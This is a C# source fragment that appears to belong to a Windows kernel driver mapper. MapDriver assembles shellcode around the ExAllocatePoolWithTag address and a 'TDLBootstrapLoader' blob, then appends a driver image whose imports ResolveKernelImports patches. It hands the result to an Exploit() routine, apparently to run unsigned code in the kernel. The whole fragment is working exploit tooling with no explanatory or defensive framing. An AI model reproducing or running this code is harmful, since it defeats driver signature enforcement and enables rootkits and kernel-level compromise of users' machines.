public static void MapDriver(String driverPath)
{
Unload();
Load();
try
{
var imageBase = Natives.LoadLibrary(driverPath);
var ExAllocatePoolWithTag = Natives.FindKernelProcedure("ExAllocatePoolWithTag");
var shellcode = new List <Byte>();
shellcode.Add(0x48); // mov rcx, ExAllocatePoolWithTag
shellcode.Add(0xb9);
shellcode.AddRange(BitConverter.GetBytes(ExAllocatePoolWithTag));
shellcode.AddRange(Shellcode.TDLBootstrapLoader_code_w10rs2);
var image = new Byte[0x7000]; // todo, pull from memory
Marshal.Copy(imageBase, image, 0, image.Length);
image = ImportResolver.ResolveKernelImports(image);
while (shellcode.Count() != 0x30a)
{
shellcode.Add(0);
}
shellcode.AddRange(image);
Exploit(shellcode.ToArray(), 0x8000, 0x30a);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
finally
{
Unload();
}
}
public static Byte[] ResolveKernelImports(Byte[] Image)
{
var headerOffset = BitConverter.ToInt32(Image, 0x3c);
var optionalHeaderOffset = headerOffset + 0x18;
var numberOfRva = BitConverter.ToInt32(Image, optionalHeaderOffset + 0x6c);
if (numberOfRva <= 1)
{
return(Image);
}
var importTableVa = BitConverter.ToInt32(Image, optionalHeaderOffset + 0x78);
if (importTableVa == 0)
{
return(Image);
}
var originalThunkPtr = BitConverter.ToInt32(Image, importTableVa + 0);
var baseThunkPtr = BitConverter.ToInt32(Image, importTableVa + 16);
for (int i = 0; ; i++)
{
var originalThunk2 = BitConverter.ToInt64(Image, originalThunkPtr + i * 8);
if (originalThunk2 == 0)
{
break;
}
var thunk = BitConverter.ToInt64(Image, baseThunkPtr + i * 8);
if (originalThunk2 > 0)
{
var name = Encoding.Default.GetString(Image.Skip((int)originalThunk2 + 2).TakeWhile(b => b != 0).ToArray());
Array.Copy(BitConverter.GetBytes((UInt64)Natives.FindKernelProcedure(name)), 0, Image, baseThunkPtr + i * 8, 8);
}
else
{
throw new Exception("Fix this");
}
}
return(Image);
}
